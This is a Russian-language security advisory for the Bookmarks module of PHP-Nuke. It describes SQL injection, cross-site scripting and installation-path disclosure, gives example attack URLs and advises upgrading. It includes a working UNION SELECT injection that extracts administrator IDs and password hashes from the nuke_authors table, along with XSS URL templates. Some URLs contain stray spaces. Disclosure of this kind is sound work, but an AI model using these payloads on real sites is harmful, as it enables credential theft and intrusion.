Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение, получить данные об установочной директории приложения и выполнить произвольные SQL команды в базе данных уязвимого приложения.
Наличие эксплоита: Да
1. SQL-инъекция существует из-за недостаточной фильтрации входных данных в параметре category модуля marks. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Пример:
[target]/modules.php?name=Bookmarks&file=marks&catna me=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors
2. Межсайтовый скриптинг возможен из-за недостаточной фильтрации HTML тегов. Удаленный пользователь может создать специально сформированный URL и выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
[target]/modules.php?name=Bookmarks&file=del_cat&catname=[htmlco de] [target]/modules.php?name=Bookmarks&file=del_mark&markname=[htmlcode] [target]/modules.php?name=Bookmarks&file=edit_cat&catname=[htmlcode] [ta rget]/modules.php?name=Bookmarks&file=edit_cat&catcomment=[htmlcode] [target]/modules.php?name=Bookmarks&file=marks&catname=[htmlcode] [target]/modules.ph p?name=Bookmarks&file=uploadbookmarks&category=[htmlcode]
3. Удаленный пользователь может получить данные об установочной директории приложения из-за недостаточной обработки входных данных в некоторых параметрах модуля marks. Пример:
[target]/modules.php?name=Bookmarks&fil e=marks [target]/modules.php?name=Bookmarks&file=marks&category=1'
URL производителя: nukebookmarks.sourceforge.net
Решение: Установите последнюю версию от производителя.